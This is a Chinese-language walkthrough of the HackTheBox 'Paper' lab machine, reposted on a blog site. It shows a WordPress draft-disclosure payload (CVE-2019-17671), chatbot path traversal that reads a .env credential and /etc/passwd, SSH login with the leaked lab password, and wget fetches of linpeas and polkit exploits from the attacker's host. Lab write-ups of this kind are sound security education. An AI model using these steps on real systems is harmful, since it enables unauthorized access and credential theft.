HackTheBox-Machines--Paper

2024-04-23 16:28
文章标签 paper machines hackthebox

本文主要是介绍HackTheBox-Machines--Paper,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • 0x01 信息收集
  • 0x02 漏洞利用 CVE-2019–17671
  • 0x03 CVE-2021-3560 权限提升

Paper 测试过程

0x01 信息收集


a.端口扫描: 发现 22、80、443 端口

nmap -sC -sV 10.129.206.164

在这里插入图片描述

2. 访问 80 / 443端口,页面一致

在这里插入图片描述

  检查页面,无可利用点。但是查看响应包,发现 X-Backed-Server 标头泄漏域名:office.paper

在这里插入图片描述

  访问 office.paper,在页面尾部发现网站使用 wordpress

echo "10.129.206.164 office.paper" | sudo tee -a /etc/hosts

在这里插入图片描述

  并且发现在 Feeling Alone! 部分描述,草稿中存在秘密信息

  如果可以在未授权情况下访问草稿文件,是不是就可以查看这些秘密信息。

在这里插入图片描述

3. 使用 Wpscan 对网站进行扫描

wpscan --url http://office.paper/ --api-token <api-keys>

在这里插入图片描述

0x02 漏洞利用 CVE-2019–17671


1.CVE-2019–17671 可以查看尚未发布的帖子

  漏洞payload:office.paper/?static=1
在这里插入图片描述

  在未发布的页面发现子域:http://chat.office.paper/register/8qozr226AhkCHZdyY

echo "10.129.206.164  chat.office.paper" | sudo tee -a /etc/hosts

在这里插入图片描述

  注册登录后进入聊天室,发现如下信息:

  > 1)recyclops help将显示命令
  > 2)recyclops 可以获取文件和列出文件
  > 3)该频道是只读的
  > 4)可以通过 DM 联系 recyclops

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2.recyclops DM 利用

  > 1)list 列出文件

  显示目录/sales/,列出有效的目录,会返回该目录的内容。如果无效的路径,则报错,并给出完整的路径,怀疑存在路径遍历。

list

在这里插入图片描述

list sale
list sales

在这里插入图片描述

list ../

  > 发现 hubot 目录
在这里插入图片描述

list ../hubot

在这里插入图片描述

file ../hubot/.env 

在这里插入图片描述

  发现用户密码:recyclops:Queenofblad3s!23

  > 2)查看 /etc/passwd 列出所有用户

在这里插入图片描述

3.ssh登录

  recyclops:Queenofblad3s!23 登录失败
  dwight:Queenofblad3s!23 登录成功

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

0x03 CVE-2021-3560 权限提升


1.使用 linpeas 工具进行信息收集

python3 -m http.server 8080
wget htpp://10.10.14.150/8080/linpeas.sh

在这里插入图片描述

chmod +x linpeas.sh
./linpeas.sh

扫描结果显示

在这里插入图片描述


Paper 测试过程未提权成功,后续待补充

2.polkitd 利用

  提权exp地址:

https://github.com/Almorabea/Polkit-exploit/tree/main

https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

wget http://10.10.14.150:8080/poc.sh
wget http://10.10.14.150:8080/CVE-2021-3560.py

  两个提权exp都已经利用,但是未成功提权,后续待补充。

在这里插入图片描述

这篇关于HackTheBox-Machines--Paper的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/929297

相关文章

【TJU】2944 Mussy Paper 最大权闭合子图

传送门:【TJU】2944 Mussy Paper 题目分析:最大权闭合子图模板题。。没啥好说的。。。 PS:置换群的轨道长度的证明迟迟没看懂。。TUT。。十分不开心就来写水题了 代码如下: #include <cstdio>#include <cstring>#include <algorithm>using namespace std ;#define R

算法——支持向量机(support vector machines,SVM)

简介:个人学习分享,如有错误,欢迎批评指正 支持向量机(Support Vector Machine, SVM)是一种监督学习算法,广泛用于分类任务,也可以用于回归和异常检测等问题。SVM的核心思想是通过在特征空间中找到一个最优的分隔超平面,将不同类别的数据点分开,使得各类别之间的间隔最大化。 一、SVM的基本概念 1. 超平面 在二维空间中,超平面就是一条直线,而在高维空间中,超平面

RAG Paper List - 检索增强生成论文汇总(2)

RAG Paper List - 检索增强生成论文汇总(2) 论文参考:Retrieval-Augmented Generation for AI-Generated Content: A Survey 摘要:模型算法的进步、基础模型的增长以及对高质量数据集的访问推动了人工智能生成内容 (AIGC) 的发展。尽管取得了显著的成功,但 AIGC 仍然面临诸如更新知识、处理长尾数据、减少数据泄漏

Soul Machines——AI生成虚拟主播或虚拟人,模拟真人交互

一、Soul Machines介绍 Soul Machines 致力于开发高度逼真的虚拟人和数字化身,通过结合人工智能、计算机图形学和面部动画技术,打造具有情感交互能力的虚拟角色。这些虚拟角色可以应用于客户服务、教育、健康护理等领域,为用户提供更具人性化和互动性的体验。 二、Soul Machines 的核心功能 1. 虚拟数字人 虚拟数字人是 Soul Machines 的核心产品,这些

HackTheBox-MonitorsThree【更新中】

总体思路 信息收集&端口利用 nmap -p1-10000 monitorsthree.htb 目标主要开放了22和80端口,还有一个8084的websnp端口 先看80端口,是一个产品界面,介绍了他们的一些防火墙、网络解决方案等等 注意到界面中有一个登录按钮,点击查看 在尝试弱口令和万能密码无果后,看到下方还存在一个忘记密码的界面,打开它 这里提示我们需要输入用户

hadoop执行分词时报错:System times on machines may be out of sync. Check system time and time zones.

解决办法: 1、安装ntpdate工具 yum -y install ntp ntpdate 2、 设置系统时间与网络时间同步 ntpdate cn.pool.ntp.org

Paper Note-MAD-GAN:基于生成对抗网络的时间序列多变量异常检测

原文标题:MAD-GAN: Multivariate Anomaly Detection for Time Series Data with Generative Adversarial Networks 原文作者:Dan Li , Dacheng Chen , Lei Shi , Baihong Jin , Jonathan Goh , and See-Kiong Ng 原文来源:2019I

CV-Paper-增量学习-Large Scale Incremental Learning

目录 0 简介1 什么是偏差2 网络3 loss4 偏差矫正层 0 简介 就简单的说明一下好了,首先是使用蒸馏学习,然后再利用验证集来学习一个简单的线性变换 ax + b 来减少偏差。 这里是把验证集也拿过来训练了,虽然只是学习一个简单的线性变换,因为这个线性变换只有两个参数,所以需要的数据量非常少,虽然这个变换很简单,但是非常有效的提高精度。 文章中说的偏差指的是增量学习

图形编辑器基于Paper.js教程03:认识Paper.js中的所有类

先来认一下Paper的资源对象,小弟有哪些,有个整体的认识。认个脸。 在Paper.js的 官方文档中类大致有如下这些: 基类: ProjectViewItemPointToolSizeSegmentRectangleCurveCurveLocationMatrixColorStyleTweenToolEventGradientGradientStopEvent 二级或三级类 继承Ite

SLAM Paper Reading和代码解析

最近对VINS、LIO-SAM等重新进行了Paper Reading和代码解析。这两篇paper和代码大约在三年前就读过,如今重新读起来,仍觉得十分经典,对SLAM算法研发具有十分重要的借鉴和指导意义。重新来读,对其中的一些关键计算过程也获得了更新清晰的了解,现整理分享出来,供有需要的同学参考。 VINS-MONO算法总结-徐胜攀.pdf资源-CSDN文库 对VINS-MONO的算法框架进